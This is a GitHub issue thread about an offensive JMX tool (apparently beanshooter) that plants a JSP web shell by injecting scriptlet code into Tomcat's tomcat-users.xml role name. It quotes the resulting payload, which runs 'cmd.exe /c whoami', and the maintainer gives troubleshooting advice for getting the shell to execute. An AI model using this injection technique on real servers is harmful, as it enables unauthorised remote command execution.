issue in creating the web shell

[0xE1C9]

Hi , Thanks for the great tool

i am on case that the webserver dosn't have any user , so the tool is creating user to write a web shell.

the tool is writing the webshell + xml content which preventing the jsp file from execution.

here is an example from the uploaded web shell

<?xml version='1.0' encoding='utf-8'?><tomcat-users xmlns="http://tomcat.apache.org/xml"              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"              version="1.0">  <role rolename="__beanshooterRole__" description=""/><%ProcessBuilder pb = new ProcessBuilder("cmd.exe", "/c", "whoami");pb.redirectOutput(new java.io.File("whoami.txt"));pb.start();%><a h=""/></tomcat-users>

[0xE1C9]

@qtc-de

[qtc-de]

Hi @0xE1C9 👋

sorry for the late response. Despite the tomcat folks have not considered this a security vulnerability, they fixed it three years ago shortly after I reported the bug. Here is the relevant commit:

apache/tomcat@38b9334

However, the output you pasted above looks good to me and your target server should still be vulnerable. For JSP to evaluate it is normally sufficient to have some JSP code anywhere within the file. Here are some further ideas:

• Are you sure that the path you are writing to has JSP enabled? Depending on the server configuration, not all paths evaluate JSP.
• Are you sure that the JSP is not evaluated? If in doubt, check with some "Hello World" JSP code instead of command execution.

Best
Tobias